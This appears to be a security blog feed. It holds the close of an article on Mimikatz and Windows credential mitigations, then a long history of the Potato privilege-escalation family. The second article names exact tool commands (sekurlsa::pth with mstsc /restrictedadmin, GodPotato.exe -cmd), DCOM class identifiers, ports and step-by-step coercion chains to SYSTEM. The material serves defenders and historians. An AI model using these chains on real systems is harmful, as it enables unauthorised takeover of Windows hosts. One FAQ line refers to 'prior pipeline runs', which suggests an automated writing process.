console.log('Alert?', isMimikatzLikely(sample)); console.log('SOCs combine this with allow-listed debugger paths and PPL state.'); `}

Note: The same Restricted Admin flag that closes the disclosure-at-server gap [@kb2871997] also enables a Pass-the-Hash operator to invoke sekurlsa::pth /run:"mstsc /restrictedadmin" from a compromised host and authenticate to the target RDP server using only the stolen NT hash [@mimikatz-github]. Restricted Admin is a disclosure mitigation, not a replay mitigation. Combine it with Remote Credential Guard (Windows 10 1607+) on tier 0 administrative paths.

1. Apply KB2871997 with `UseLogonCredential = 0` on every supported Windows. Zero downside. 2. Enable `RunAsPPL = 1` after a one-cycle LSA plug-in audit. Plan a rollback for any custom credential provider not yet re-signed at the PPL signer level [@ms-lsa-protection]. 3. Adopt the Pass-the-Hash v2 tiering model as planning vocabulary, then operationalise it as Microsoft's *Securing Privileged Access* / Enterprise Access Model documentation. Multi-year programme; treat as a roadmap [@ms-pth-v2]. 4. Use Restricted Admin for administrative RDP; promote to Remote Credential Guard on tier 0 paths. 5. Run AppLocker on every Enterprise SKU you have not yet migrated to WDAC [@ms-applocker]. Ensure the Application Identity service (`AppIDSvc`) is set to start automatically by policy, since AppLocker does not enforce when it is stopped. 6. Enable Secure Boot, Measured Boot, and BitLocker (TPM + PIN) on every laptop [@ms-secure-boot]. Microsoft's default platform validation profile on native UEFI + Secure Boot systems is PCR 7 (Secure Boot State) and PCR 11 (BitLocker access control), which is the *correct* profile to use when Secure Boot is on and the platform's option ROMs are trusted [@ms-bitlocker-configure]. For hardened estates that want to detect tampering with the UEFI firmware itself, the option-ROM configuration, or the boot-manager binary independent of Secure Boot's signature check, expand the profile to PCRs 0, 2, 4, 7, 11 -- adding PCR 0 (UEFI firmware code), PCR 2 (option-ROM code), and PCR 4 (boot-manager binary measurements) on top of the default [@ms-bitlocker-countermeasures]. The hardened profile generates more BitLocker recovery-key prompts after legitimate firmware updates, so the operational cost is real and the choice between the two profiles is the standard balance between detection coverage and help-desk load. 7. Enable Credential Guard (Windows 10 1607+) on every estate whose hardware supports it [@ms-credential-guard]. This is the architectural answer; everything above is harm reduction.

The 2009-2014 primitives are still here. So is Mimikatz. Part 4 explains why, and what Microsoft did about it.

11. Frequently asked questions

No. The four zero-days -- MS10-046 (LNK shortcut RCE), MS10-061 (Print Spooler RCE), MS10-073 (win32k.sys keyboard-layout LPE), and MS10-092 (Task Scheduler LPE) -- were used across the worm's propagation and escalation surfaces, *not* chained in a single sequential exploit [@symantec-stuxnet-dossier-v14; @ms-bulletin-ms10-046; @ms-bulletin-ms10-061; @ms-bulletin-ms10-073; @ms-bulletin-ms10-092]. Different hosts encountered different combinations depending on patch level, USB usage, network shape, and whether the local user already had administrative privileges. Only with two qualifiers -- multi-zero-day and kinetic-physical effect. Operation Aurora (January 12, 2010) used a single Internet Explorer 0-day (CVE-2010-0249) against Google and at least twenty other named victims including Adobe, Juniper, Yahoo, Symantec, Northrop Grumman, Dow Chemical, and Morgan Stanley (full sourcing and the verbatim Google wording in §3.6) [@google-aurora-wayback; @nvd-cve-2010-0249]; Stuxnet (June 17, 2010) used four zero-days for kinetic effect [@symantec-stuxnet-dossier-v14]. Drop either qualifier and Aurora falsifies the framing. No. The Pass-the-Hash concept dates to Paul Ashton's 1997 NTBugtraq post [@wikipedia-pth] and was operationalised by Hernan Ochoa's 2008 Pass-the-Hash Toolkit (`iam.exe` / `whosthere.exe`) at Core Security Corelabs [@core-ptht-2008]. What Mimikatz did was make the primitive operational on a default-configured modern Windows host without requiring custom NTLM client code [@greenberg-mimikatz-wired; @mimikatz-github]. It turned a known protocol weakness into a one-line operator tool that ran against any LSASS the operator could `OpenProcess` against, and it added the Kerberos primitives (Pass-the-Ticket, Overpass-the-Hash, Golden Ticket) that previous Pass-the-Hash toolchains had not addressed. Skip Duckwall and Chris Campbell's *Pass-the-Hash 2: The Admin's Revenge* at Black Hat USA 2013 formalised the graph-walking discipline that ties Mimikatz primitives together into the lateral-movement operating model the rest of the decade inherits [@duckwall-campbell-bh2013]. Partially. The headline CVE (CVE-2014-6321) was patched on a published Patch Tuesday bulletin on November 11, 2014 [@ms-bulletin-ms14-066; @nvd-cve-2014-6321] with contemporary KrebsOnSecurity coverage [@krebs-ms14-066] and public proof-of-concept walkthroughs within months. The "silent" framing applies only to the additional Schannel hardening fixes Microsoft bundled into the same bulletin without separate disclosures. This article deliberately does not name specific CVE IDs for those bundled extras, because prior pipeline runs found such attributions factually wrong. It wasn't, because Microsoft published v1 in December 2012 [@ms-pth-v1-landing] and v2 in July 2014 [@ms-pth-v2] and then migrated subsequent guidance into the post-2014 *Securing Privileged Access* online documentation rather than producing a numbered v3 PDF. Any "v3 2017" reference in secondary sources is incorrect; the canonical documentation chain after v2 is the *Securing Privileged Access* and *Enterprise Access Model* pages on Microsoft Learn. No. The Symantec dossier was authored by Nicolas Falliere, Liam O Murchu, and Eric Chien of Symantec Security Response, v1.4, February 2011 [@symantec-stuxnet-dossier-v14]. Bruce Dang was at Microsoft's Security Response Center and co-presented "Adventures in Analyzing Stuxnet" with Peter Ferrie at the 27th Chaos Communication Congress (27C3) in Berlin on December 27, 2010 [@dang-ferrie-27c3], which is a separate primary covering the win32k.sys CVE-2010-2743 kernel exploit walkthrough (the 27C3-not-29C3 venue correction is documented in the §3.1 sidenote). Dang's affiliation is Microsoft MSRC, not Symantec. No. Mimikatz's first public release was May 2011 (closed source) [@greenberg-mimikatz-wired; @wikipedia-mimikatz]. The GitHub repository `gentilkiwi/mimikatz` was created on April 6, 2014 at 18:30:02 UTC -- a timestamp anyone can verify via the GitHub API [@mimikatz-github]. Any "2007" date refers to Delpy's pre-release private experimentation, not a public release. No. Both anchor events post-date the Part 3 window. Dell SecureWorks Counter Threat Unit disclosed the Skeleton Key malware family on January 12, 2015 [@secureworks-skeleton-key], and Delpy added the corresponding `misc::skeleton` module to Mimikatz on January 17, 2015. Skeleton Key, DCSync, and the Credential Guard architectural pivot are the spine of Part 4 [@metcalf-dcsync; @ms-credential-guard].

Skeleton Key. Virtualisation-Based Security. Credential Guard. Part 4 opens on January 17, 2015, with the same Mimikatz codebase and a new technique.

SYSTEM in Ten Seconds: How the Potato Family Survived Every Microsoft Mitigation

noreply@paragmali.com (Parag Mali) — Sun, 31 May 2026 00:00:00 GMT

The Potato family is a decade of Windows local privilege escalation, eleven named variants disclosed between January 2016 (HotPotato) and August 2024 (FakePotato), all pivoting on the same primitive: `SeImpersonatePrivilege` (introduced as a defined user right in the Windows 2000 SP4 / XP SP2 / Server 2003 hardening cycle [@msrc-token-kidnapping; @ms-impersonate-policy]) plus `ImpersonateNamedPipeClient` (a Win32 primitive documented as supported since Windows XP for clients and Windows Server 2003 for servers [@ms-impersonate-api]). Each variant -- HotPotato (January 2016), RottenPotato, JuicyPotato, RoguePotato, PrintSpoofer, RemotePotato0, JuicyPotatoNG, GodPotato (the 2026 default), LocalPotato (CVE-2023-21746), SilverPotato, FakePotato (CVE-2024-38100) -- defeats a specific Microsoft mitigation, but no mitigation closes the family. The structural reason is the MSRC Windows Security Servicing Criteria, which treats the `SeImpersonatePrivilege`-to-SYSTEM transition as a safety boundary, not a security boundary. The Potato class is therefore an architectural decision, not a bug.

1. A Web Shell, Ten Seconds, SYSTEM

A red teamer drops a web shell on an Internet Information Services server running as IIS APPPOOL\DefaultAppPool. Ten seconds later, the shell prints nt authority\system. The operator did not exploit a memory-corruption bug, did not bypass a kernel security boundary, did not even use an undocumented API. They invoked CoCreateInstance against a Distributed COM (DCOM) class identifier, waited for the SYSTEM-context RPCSS service to authenticate to a named pipe they owned, and called ImpersonateNamedPipeClient [@ms-impersonate-api]. Every step was documented Win32 behaviour. The exploit is that Microsoft has spent a decade refusing to call any of those steps a security boundary [@msrc-servicing-criteria; @troopers24].

The artefact in the operator's hand is one of several. In May 2026 it is most likely GodPotato.exe -cmd "cmd /c whoami" -- a single Apache 2.0-licensed binary that BeichenDream published on GitHub on December 23, 2022 [@beichendream-god]. The README says it works on every supported Windows release from Windows 8 through Windows 11, and from Server 2012 through Server 2022 [@beichendream-god]. Community testing has since extended the working range to Server 2025 with default Distributed COM hardening enabled [@compass-three-headed].

A Windows user-rights assignment that lets a thread substitute another user's security context for its own (typically via `ImpersonateNamedPipeClient` or `ImpersonateLoggedOnUser`). Granted by default to `LOCAL SERVICE`, `NETWORK SERVICE`, every Internet Information Services application-pool identity, and most service accounts [@ms-impersonate-policy]. Introduced as a defined user right in the Windows 2000 SP4 / XP SP2 / Server 2003 service-hardening cycle that MSRC discusses in its 2009 Token Kidnapping retrospective [@msrc-token-kidnapping], after which possessing it has been one named-pipe round-trip away from being SYSTEM.

The IIS context matters. The default application-pool identity holds SeImpersonatePrivilege because IIS depends on it for legitimate request-scoped impersonation [@itm4n-printspoofer]. So does the default SQL Server service account, the Background Intelligent Transfer Service (BITS) account, the Spooler service account, and every account that hosts a Windows service that may need to "act as" a calling user. Anyone who can run code inside one of those accounts can run code as SYSTEM in seconds.

Note: Every step the operator takes -- CoCreateInstance, the SYSTEM-context RPCSS authentication, ImpersonateNamedPipeClient, the subsequent CreateProcessWithToken -- is in Microsoft's published Win32 contract [@ms-impersonate-api; @ms-dcom-spec]. None of them is a memory-corruption bug. The "exploit" is the existence of a documented call sequence that turns a service account into SYSTEM, on a fully-patched Windows 11 box, in 2026.

This is the puzzle the rest of the article is here to solve. The technique has been a one-binary operation for nearly a decade [@troopers24]. Microsoft has shipped three named hardening waves against it (a 2019-2020 OXID-resolver fix [@forshaw-pz-2021]; the three-phase CVE-2021-26414 Distributed COM hardening rollout from June 2021 to March 2023 [@ms-kb5004442]; and per-variant CVE patches in 2023 and 2024 [@nvd-cve-2023-21746; @nvd-cve-2024-38100]). None of those waves closed the family. Why?

2. The Architectural Primitive

The answer is in a Microsoft document called the Windows Security Servicing Criteria [@msrc-servicing-criteria]. It defines what Microsoft will and will not service as a security vulnerability. Quoting the document directly: "A security boundary provides a logical separation between the code and data of security domains with different levels of trust" [@msrc-servicing-criteria]. The page then lists the boundaries Microsoft has defined for Windows -- kernel mode versus user mode, virtual machine versus host, session versus session, and so on. The list is the enumeration that decides which bug classes get CVEs and which do not.

The Potato family pivots on a transition that is conspicuously not on the list: a service account that holds SeImpersonatePrivilege becoming SYSTEM. As Andrea Pierini and Antonio Cocomazzi articulated in the Troopers 24 retrospective, Microsoft's published position is that the Windows Service Hardening boundary is a safety boundary rather than a security boundary, which is why so many Potato exploits continue to work on fully updated Windows systems [@troopers24]. WSH is Microsoft's own shorthand for Windows Service Hardening -- the family of post-XP-SP2 protections that isolate service accounts from one another. The position is consistent with everything Microsoft has shipped: per-variant patches when a specific vehicle becomes too embarrassing, and silence on the underlying primitive. (The verbatim Troopers 24 articulation appears in §13.)

The boundary *definition* on `microsoft.com/en-us/msrc/windows-security-servicing-criteria` is rendered in static HTML and can be fetched directly [@msrc-servicing-criteria]. The boundary *enumeration table* immediately below it, which lists the bug classes that do and do not get CVEs, is JavaScript-rendered and does not appear in static fetches. The community-canonical secondary source for what is on that list is the Troopers 24 talk by Pierini and Cocomazzi [@troopers24], cross-referenced against James Forshaw's Project Zero retrospective from October 2021 [@forshaw-pz-2021] and Mark Russinovich's `aka.ms/win-security-boundaries` paraphrase. This article cites the primary for the definition and the Troopers retrospective for the enumeration.

Three primitives, taken together, mechanically determine the entire family. Once they are stated, the only remaining question is which SYSTEM-context service is cheapest to coerce.

Primitive one: SeImpersonatePrivilege

SeImpersonatePrivilege is a Windows user-rights assignment that permits a thread to call ImpersonateNamedPipeClient, ImpersonateLoggedOnUser, and the related impersonation APIs [@ms-impersonate-policy]. By Windows default, it is granted to LOCAL SERVICE, NETWORK SERVICE, every Internet Information Services application-pool identity, and most service accounts that need to act on behalf of clients [@itm4n-printspoofer]. (For when the right was introduced and a working definition, see §1; Decoder's one-sentence summary of what the grant means in practice is the climactic PullQuote in §6.3.)

Primitive two: ImpersonateNamedPipeClient

A Win32 API that lets the server end of a named pipe adopt the security context of whoever just connected to that pipe. After the call, the calling thread holds an impersonation token for the client identity, and any subsequent system call (including `CreateProcessWithToken`) executes as that identity. The function has been part of `namedpipeapi.h` since Windows XP for clients and Windows Server 2003 for servers, with no deprecation notice as of the 2025-07-01 documentation revision [@ms-impersonate-api].

The mechanism is exactly the one a SYSTEM-context service uses for legitimate request-scoped impersonation. The Potato class subverts it by getting a SYSTEM-context service to connect to a pipe the attacker owns. No memory corruption, no kernel exploit, no undocumented API. The Win32 reference describes the call as the standard way for a pipe server to "impersonate the client end" [@ms-impersonate-api].

Primitive three: the MSRC servicing-criteria carve-out

The third primitive is policy, not code. The MSRC document distinguishes a security boundary (whose violation gets a CVE and a security update) from a safety boundary (where Microsoft will patch when convenient but does not commit to a service-level objective). The defensible reading, articulated explicitly by Pierini and Cocomazzi at Troopers 24, is that the SYSTEM-from-SeImpersonate transition lives on the safety side [@troopers24]. The implication is structural: a service account holding SeImpersonatePrivilege "is already privileged" in Microsoft's policy view. Promoting it to SYSTEM is therefore not a privilege escalation that requires a security update.

flowchart LR A[Service account with SeImpersonatePrivilege] --> B[Coerce SYSTEM-context service to connect to attacker-owned named pipe] B --> C[Call ImpersonateNamedPipeClient on server thread] C --> D[Thread now holds SYSTEM impersonation token] D --> E[CreateProcessWithToken spawns SYSTEM process] F[MSRC servicing criteria carve-out] -.->|"Allows step A to remain a default grant"| A F -.->|"Allows step C to remain a documented Win32 API"| C

Taken together, the three primitives reduce the entire Potato family to a single problem statement: find the cheapest SYSTEM-context service to coerce into a callback. Every named variant since 2016 is an answer to that problem.

Key idea: Microsoft does not consider the SeImpersonatePrivilege-to-SYSTEM transition a security boundary; it considers it a safety boundary. The Potato family is the consequence. Variants change vehicles -- NetBIOS spoofing, BITS DCOM, Print Spooler RPC, EFS RPC, RPCSS OXID, ShellWindows -- but every one of them lives on the same architectural carve-out [@troopers24; @msrc-servicing-criteria].

The phrase aka.ms/win-security-boundaries was popularised by Mark Russinovich's Channel 9 talks of the late 2010s. Channel 9 was retired on December 1, 2021, so the link is now mostly cited as a memorable handle for the boundary list rather than as a clickable URL. The live equivalent is the MSRC servicing criteria document itself [@msrc-servicing-criteria].

Given primitives this old and this widely default-granted -- both the named-pipe impersonation API and the SeImpersonatePrivilege user right have been in their current form since the Windows 2000 SP4 / Server 2003 / XP SP2 service-hardening cycle [@msrc-token-kidnapping; @ms-impersonate-policy; @ms-impersonate-api] -- the natural question is why the named Potato family did not appear until 2016. The next section is the answer.

3. The Long Pre-Potato Era, 2001-2015

In March 2008, Cesar Cerrudo stood on a stage in Dubai at Hack-in-the-Box and demonstrated that a SYSTEM-context Windows service holding SeImpersonatePrivilege was, in effect, one named-pipe call away from SYSTEM [@cerrudo-hitb-slides; @msrc-token-kidnapping]. Microsoft acknowledged the technique on the MSRC blog on April 14, 2009, and shipped MS09-012 -- the patch Cerrudo later nicknamed "Chimichurri" in his Black Hat USA 2010 follow-up [@msrc-token-kidnapping; @blackhat-2010-cerrudo]. Cerrudo extended the work two years later at Black Hat USA 2010 in a paper titled "Token Kidnapping's Revenge" [@blackhat-2010-cerrudo]. Microsoft patched the specific NetworkService-to-SYSTEM vehicle. They did not revoke the privilege from the service accounts that held it [@msrc-token-kidnapping].

That pattern -- patch the vehicle, leave the primitive -- is the family's bequest from Cerrudo.

NTLM **relay** forwards an NTLM authentication captured from victim A to a different server B, where the attacker authenticates as A. NTLM **reflection** is the special case where B is the same machine (often the same protocol) as A. Microsoft fixed the most obvious same-protocol case with MS08-068 in 2008 [@ms-ms08-068]. Cross-protocol reflection (HTTP-to-SMB, DCOM-to-RPC) was not closed by that patch and became the doorway through which the Potato family entered.

Seven years before Cerrudo, on March 31, 2001, Sir Dystic of the Cult of the Dead Cow stood on a different stage at @lanta.con in Atlanta and released SMBRelay, the first public same-protocol NTLM relay tool [@cultdeadcow-smbrelay]. Microsoft eventually responded with MS08-068, a same-protocol-only fix [@ms-ms08-068]. Cross-protocol relay -- HTTP to SMB, DCOM to local RPC -- remained open.

That opening was the canvas James Forshaw painted on. In December 2014, then at Google Project Zero, Forshaw filed Issue 222 ("Windows: Local WebDAV NTLM Reflection EoP") demonstrating that the WebClient service performs NTLM authentication when asked to open a WebDAV URL, and that the resulting NTLM session can be reflected cross-protocol to the local SMB service [@forshaw-pz-2021]. A few months later Forshaw filed Issue 325, showing that CoGetInstanceFromIStorage could coerce a DCOM activation into authenticating to an attacker-controlled TCP endpoint. Microsoft patched the 2015 issue as CVE-2015-2370 [@nvd-cve-2015-2370]. In his October 2021 retrospective Forshaw wrote, with the laconic precision of a researcher whose contributions are still being weaponised seven years later:

The technique to locally relay authentication for DCOM was something I originally reported back in 2015 (issue 325). This issue was fixed as CVE-2015-2370, however the underlying authentication relay using DCOM remained. This was repurposed and expanded upon by various others for local and remote privilege escalation in the RottenPotato series of exploits. -- James Forshaw, Project Zero, October 2021 [@forshaw-pz-2021]

Cerrudo nicknamed the MS09-012 patch "Chimichurri" after the Argentine green sauce, and used the name when he reprised the work at Black Hat USA 2010 [@blackhat-2010-cerrudo]. Cerrudo was at Argeniss and later IOActive when he developed the technique [@msrc-token-kidnapping; @blackhat-2010-cerrudo].

The primary artefact for Cerrudo's March 2008 Hack-in-the-Box Dubai talk (slides, video, abstract) is no longer reachable on the conference site; the MSRC blog's retrospective is the canonical secondary that anchors the date and venue [@msrc-token-kidnapping]. The Black Hat USA 2010 "Token Kidnapping's Revenge" whitepaper [@blackhat-2010-cerrudo] is the durable primary for the underlying technique.

gantt title Pre-Potato lineage 2001-2015 dateFormat YYYY-MM section NTLM relay SMBRelay (Sir Dystic) :a1, 2001-03, 1M MS08-068 same-protocol fix :a2, 2008-10, 1M section Token escalation Token Kidnapping HITB Dubai (Cerrudo) :b1, 2008-03, 1M MS09-012 Chimichurri :b2, 2009-04, 1M Token Kidnapping's Revenge (Cerrudo) :b3, 2010-07, 1M section DCOM primitive Project Zero Issue 222 (Forshaw) :c1, 2014-12, 1M Project Zero Issue 325 (Forshaw) :c2, 2015-04, 1M CVE-2015-2370 patch :c3, 2015-07, 1M

By the end of 2015 the three pieces were on the table. A long-standing default privilege grant (Cerrudo's "SeImpersonate equals SYSTEM" thesis). A specific cross-protocol reflection technique (Forshaw's WebDAV-to-SMB Issue 222). A specific DCOM-activation coercion primitive (Forshaw's CoGetInstanceFromIStorage Issue 325). Microsoft had patched the literal bug in the third piece and explicitly declined to revoke the privilege in the first. The technique was published, the proof-of-concept code was on GitHub, and the family was a binary release away. The next chapter is the moment someone shipped the binary.

4. HotPotato, January 16, 2016

On January 16, 2016, Stephen Breen of Foxglove Security published a blog post titled "Hot Potato" [@foxglove-hotpotato]. He had just spoken at ShmooCon. The repository, foxglovesec/Potato, would land on GitHub three weeks later, on February 9, 2016 [@foxglove-potato-repo]. The post's opening sentence is the family's birth certificate:

Hot Potato (aka: Potato) takes advantage of known issues in Windows to gain local privilege escalation in default configurations, namely NTLM relay (specifically HTTP->SMB relay) and NBNS spoofing. -- Stephen Breen, Foxglove Security, January 16, 2016 [@foxglove-hotpotato]

Breen had not invented NTLM reflection. He had combined three existing primitives into a single-binary, one-click privilege escalation that worked on every default Windows install from Windows 7 through Server 2012 [@foxglove-hotpotato]. The Foxglove post acknowledges the lineage explicitly: "a similar technique was disclosed by the guys at Google Project Zero ... In fact, some of our code was shamelessly borrowed from their PoC" [@foxglove-hotpotato].

How HotPotato works

The exploit chains three independent tricks. Step one is UDP-port exhaustion. The tool opens enough UDP sockets that the local NetBIOS Name Service (NBNS) name lookups fail, forcing Windows to fall back to broadcast-based name resolution [@foxglove-hotpotato]. Step two is NBNS spoofing of the WPAD hostname, pointed at 127.0.0.1. Step three is the actual reflection: when Windows Update or Windows Defender polls for an update, it consults the WPAD URL, gets the attacker's proxy auto-configuration script, and routes its HTTP requests through the attacker's local listener -- which then relays the SYSTEM-context NTLM negotiation to the local SMB service [@foxglove-hotpotato].

sequenceDiagram participant Atk as Hot Potato tool participant NBNS as NetBIOS Name Service participant WU as Windows Update (SYSTEM) participant WPAD as WPAD HTTP listener (attacker) participant SMB as Local SMB service Atk->>NBNS: UDP-flood to exhaust ports and force broadcast Atk->>NBNS: Spoof WPAD hostname pointing at 127.0.0.1 WU->>WPAD: GET wpad.dat over HTTP WPAD-->>WU: Attacker-supplied proxy auto-config WU->>WPAD: HTTP request with SYSTEM-context NTLM negotiate WPAD->>SMB: Reflect the NTLM exchange to local SMB SMB-->>Atk: SMB session authenticated as SYSTEM Atk->>Atk: ImpersonateNamedPipeClient and spawn SYSTEM shell

The result was a single binary that produced a SYSTEM shell from any local user account on the target host -- because on a default Windows install every authenticated local user can run code, open UDP sockets, and bind a loopback HTTP listener, which is all HotPotato needs to bootstrap.

Note: HotPotato does not use Distributed COM activation at all. It uses NetBIOS spoofing, WPAD hijacking, and HTTP-to-SMB cross-protocol relay. The family is named for HotPotato but the defining primitive of every later variant -- DCOM activation -- is absent. HotPotato is in the family because it pivots through the same SeImpersonatePrivilege plus named-pipe-impersonation core, which is the actual definition of the family. The repository name Potato and the family naming convention are both Breen's [@foxglove-potato-repo].

The naming pattern that has now produced eleven variants started with the GitHub repository name foxglovesec/Potato [@foxglove-potato-repo]. Breen later wrote that "Hot" was a riff on the fact that the SYSTEM token was passed around like a hot potato; the suffix convention spread from there organically.

Why HotPotato did not last

HotPotato had three structural weaknesses. NetBIOS spoofing is unreliable: the UDP-port exhaustion can fail under load, group policy can pin a real WPAD URL, and a legitimate WPAD response can win the race. NetBIOS is disabled in security-hardened environments as a matter of routine. And the HTTP-to-SMB cross-protocol path was the very thing Extended Protection for Authentication and SMB channel-binding tokens were designed to close [@crowdstrike-drop-mic]. On a Windows 10 1607 host with EPA on the SMB server, HotPotato failed.

Researchers needed a coercion vehicle that was deterministic, did not rely on broadcast spoofing, and used a protocol Microsoft had not yet hardened end-to-end. Forshaw's Project Zero Issue 325 -- the CoGetInstanceFromIStorage DCOM trigger -- met all three criteria [@forshaw-pz-2021]. The next variant weaponised it.

5. The DCOM-Activation Breakthrough, 2016-2018

5.1 RottenPotato (DerbyCon 6, September 2016)

Eight months after HotPotato, Stephen Breen returned with a co-author and a new vehicle. The talk was on September 23, 2016 -- the Friday of DerbyCon 6 -- and the blog post followed three days later [@foxglove-rottenpotato]. The Foxglove post identifies the co-author by name: "myself and my partner in crime, Chris Mallz (@vvalien1) spoke at DerbyCon about a project we've been working on for the last few months" [@foxglove-rottenpotato].

Many secondary sources credit Andrea Pierini (Decoder) as the RottenPotato co-author. The Foxglove primary disproves this verbatim [@foxglove-rottenpotato]. Decoder enters the family lineage two years later, with JuicyPotato in 2018 [@ohpe-juicy]. Chris Mallz is the actual RottenPotato co-author.

RottenPotato replaced HotPotato's NetBIOS-and-WPAD chain with Forshaw's DCOM-activation primitive. The hard-coded target was the Background Intelligent Transfer Service (BITS) Distributed COM server, class identifier {4991d34b-80a1-4291-83b6-3328366b9097}, and the hard-coded listener port was 127.0.0.1:6666 [@foxglove-rottenpotato; @foxglove-rotten-repo].

A Win32 OLE function that instantiates a Distributed COM object using a marshalled `IStorage` interface pointer as the activation source. By marshalling an `IStorage` whose object exporter identifier (OXID) resolves to an attacker-controlled TCP endpoint, the activator can redirect the resulting authentication callback to a listener it owns. Forshaw filed this as Project Zero Issue 325 in 2015 [@forshaw-pz-2021]; RottenPotato weaponised it. sequenceDiagram participant Atk as RottenPotato (service account) participant Pipe as Local listener on 127.0.0.1:6666 participant DCOM as DCOM activation (RPCSS) participant BITS as BITS COM server (SYSTEM) participant RPC as Local RPC on port 135 Atk->>Pipe: Start TCP listener on 127.0.0.1:6666 Atk->>DCOM: CoGetInstanceFromIStorage with BITS CLSID and marshalled IStorage DCOM->>BITS: Spawn BITS under SYSTEM context BITS->>Pipe: Callback to the marshalled endpoint Pipe->>RPC: Forward COM packets to local RPC on port 135 RPC-->>Pipe: Reply containing SYSTEM-context NTLM exchange Pipe-->>Atk: SYSTEM authentication captured Atk->>Atk: ImpersonateNamedPipeClient and CreateProcessWithToken

The technique was 100% reliable on Windows 7 through Windows 10 1803 and Server 2008 R2 through Server 2016 [@foxglove-rottenpotato]. There was no broadcast spoofing on the wire, no race condition, and no dependence on Windows Update polling. The price was rigidity: the hard-coded BITS class identifier and port 6666 made the tool brittle to BITS being disabled, and the original release depended on the Metasploit framework.

5.2 RottenPotatoNG and lonelypotato

In December 2017, the user breenmachine published RottenPotatoNG, a C++ port that removed the Metasploit dependency: "New version of RottenPotato as a C++ DLL and standalone C++ binary - no need for meterpreter or other tools" [@breenmachine-rottenng]. The codebase that JuicyPotato would later generalise was now in place.

Many surveys date the `decoder-it/lonelypotato` variant to "early 2018" and place it as the link between RottenPotatoNG and JuicyPotato. The GitHub REST API reports `created_at: 2020-02-08T16:30:00Z` for the repository [@decoder-lonely], a full two years later. Decoder's first appearance in the Potato lineage is actually the December 6, 2019 post "We thought they were Potatoes but they were Beans" [@decoder-beans], with `lonelypotato` arriving in February 2020 as a post-OXID-hardening cleanup variant adjacent to RoguePotato [@decoder-lonely]. The 2017-2018 attribution is a citation error that has propagated across several survey papers.

5.3 JuicyPotato (Pierini + Trotta, July-August 2018)

What if any class identifier, not just the BITS one, could be the activation target? On July 27, 2018, Andrea Pierini and Giuseppe Trotta published the answer. The repository ohpe/juicy-potato was created that day per the GitHub REST API; the blog post followed on August 10, 2018 [@ohpe-juicy]. The repository description reads: "Juicy Potato (abusing the golden privileges) -- A sugared version of RottenPotatoNG, with a bit of juice" [@ohpe-juicy].

The original JuicyPotato blog post at decoder.cloud/2018/08/10/juicy-potato-abusing-the-golden-privileges/ returns HTTP 404 in 2026, and no Wayback Machine snapshot exists for that exact URL. The ohpe/juicy-potato README is the live verbatim mirror of the title and the technique walkthrough [@ohpe-juicy]. Pierini's blog has reorganised several times; older posts that survive elsewhere on decoder.cloud include the October 2018 "No more Rotten/Juicy Potato" [@decoder-no-more-rotten] and the December 2019 "We thought they were Potatoes" [@decoder-beans].

JuicyPotato turned RottenPotato into a search engine. The README ships a per-Windows-version class identifier matrix: each row a Windows release, each column a CLSID that activates under SYSTEM context and implements the IMarshal interface [@ohpe-juicy]. The tool accepts a tunable listener port (replacing the hard-coded 6666), a tunable process-creation mode (CreateProcessWithToken for SeImpersonate holders, CreateProcessAsUser for SeAssignPrimaryToken holders, or both), and a TEST mode for class-identifier discovery [@ohpe-juicy].

Microsoft does not freeze the set of registered Distributed COM class identifiers across Windows builds. Default COM-server registrations change between releases as components are added, removed, or refactored. A class identifier that activates under SYSTEM on Windows 10 1709 may not exist on Server 2019. JuicyPotato's CLSID matrix is therefore not a static lookup table -- it is the precomputed result of an empirical per-build search [@ohpe-juicy]. Every red-team handbook published between 2018 and 2020 references this matrix; subsequent variants (RoguePotato, JuicyPotatoNG) inherit and update it. flowchart TD A[Enumerate registered DCOM CLSIDs on target build] --> B{"For each CLSID"} B --> C[Attempt CoGetInstanceFromIStorage with marshalled IStorage] C --> D{"Activation reaches attacker listener?"} D -->|No| B D -->|Yes| E{"Callback authenticates as SYSTEM?"} E -->|No| B E -->|Yes| F[Log CLSID into per-OS matrix] F --> B B --> G[Output: working CLSID for this Windows build]

The Potato class was now universal. From mid-2018 through 2019 it was the default tool in every red-team handbook, every Metasploit-adjacent post-exploitation cheat-sheet, and every penetration-testing certification's lab. Microsoft had noticed.

6. The Mitigation Arms Race, 2020-2024

Every subsection below is the same shape: Microsoft ships a mitigation, researchers find a counter-move, MSRC produces an artifact (a CVE, a "Won't Fix" decision, or silence), and the architectural reading gets one more empirical confirmation.

6.1 The first Distributed COM mitigation, 2019-2020

In late 2018, Windows 10 1809 and Server 2019 began shipping a change to RPCSS. JuicyPotato stopped working. Researchers who reverse-engineered the change discovered that the OXID resolver address on the local Distributed COM activation path was now hard-coded to 127.0.0.1:135. The marshalled IStorage callback could no longer be redirected to an arbitrary loopback port. Forshaw described it bluntly three years later:

Being able to redirect the OXID resolver RPC connection locally to a different TCP port was not by design and Microsoft eventually fixed this in Windows 10 1809/Server 2019. -- James Forshaw, October 2021 [@forshaw-pz-2021]

No CVE was assigned. The change shipped silently as part of the regular Patch Tuesday cycle [@forshaw-pz-2021]. Pierini and Cocomazzi tested it on their own workloads and confirmed the failure mode publicly in October 2018: "Recently I downloaded the new Windows server 2019 and upgraded my Win10 box to 1809 ... the juicy/rotten exploit ... did not work on both OS" [@decoder-no-more-rotten].

Note: The 2019-2020 OXID-resolver change is the first Microsoft response to the Potato family. It does not declare Distributed COM activation a security boundary. It narrows the resolver port to 135 and leaves the underlying primitive (coerce SYSTEM context via OXID resolver, then impersonate the resulting token) intact. The mitigation defines exactly one specific bypass; researchers had to discover that themselves [@forshaw-pz-2021; @decoder-no-more-rotten].

6.2 RoguePotato (Cocomazzi + Pierini, May 2020)

On May 10, 2020, Antonio Cocomazzi published the RoguePotato repository on GitHub [@antonio-rogue]. The disclosure post appeared the next day, May 11. The README banner is "RoguePotato @splinter_code & @decoder_it" -- the same Pierini-and-Cocomazzi team that goes on to author RemotePotato0, JuicyPotatoNG, LocalPotato, and SilverPotato [@antonio-rogue].

The counter-move accepts the hard-coded port-135 constraint and works around it. RoguePotato is two pieces. On an attacker-controlled remote host, run a port forwarder that listens on TCP 135 and redirects to a chosen attacker port. On the target, run RoguePotato.exe pointing the OXID resolver at the remote forwarder. RPCSS dutifully sends the resolution request to the remote host on port 135 (since Microsoft hard-coded the port, not the host); the forwarder bounces the traffic back to the target on the attacker-chosen port; RoguePotato impersonates the OXID resolver and steers the activation back to a SYSTEM-context COM server [@antonio-rogue]. Standard NTLM relay and named-pipe impersonation finish the job.

